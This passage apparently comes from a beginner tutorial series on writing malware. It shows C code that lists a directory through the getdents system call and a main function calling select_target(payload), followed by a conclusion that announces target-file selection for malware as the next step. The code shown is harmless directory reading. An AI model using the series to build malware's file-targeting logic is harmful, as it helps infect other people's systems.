Open directory using open 484 | if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:"); 485 | 486 | while (1) { 487 | n = getdents (fd, buf, BUF_SIZE); 488 | if (n < 0) MFW_EXIT ("getdents:"); 489 | if (n == 0) break; 490 | 491 | for (i = 0; i < n;) { 492 | de = (struct linux_dirent *)(buf + i); 493 | pf (de->d_name); 494 | i += de->d_reclen; 495 | } 496 | } 497 | close (fd); 498 | return 0; 499 | } 500 | 501 | int main (int argc, char *argv[]) { 502 | strcpy (folder, argv[1]); 503 | while (select_target(payload)); 504 | } 505 | 506 | ``` 507 | 508 | It has some minor changes and all the required includes and defines. I would recommend to go through it and try to understand the stuff that is not described in this text. Do not hesitate to ask in the comments if you do not understand something. 509 | 510 | # Conclusions 511 | 512 | We have learnt how to read a directory using the standard POSIX interface and also using system calls. We have also learnt about function pointers and `structs`. A lot of stuff to digest. I know. 513 | 514 | This is the first step to implement the `select_target` function. The second one is to be able to determine the details of each file in the directory and thus select the target needed by each specific malware. This is what we will deal with in the next instalment. 515 | 516 | Note that these articles are intended for newbies, so be free to ask in the comments about any doubt. There is no stupid question when you are starting so do not be shy, I'll try to answer all of your doubts and I'm also interested on knowing if the level of the text is too easy or too hard, so your feedback will be pretty much appreciated. 517 | 518 | However I would recommend to first try to answer your question by yourself, using Google, and rechecking the previous instalments. It is not just bad [nettiquette ](https://en.wikipedia.org/wiki/Etiquette_in_technology) it is also way better for you to learn. The things you learn by yourself remind steady in your memory and broads your view of the topic. 519 | --------------------------------------------------------------------------------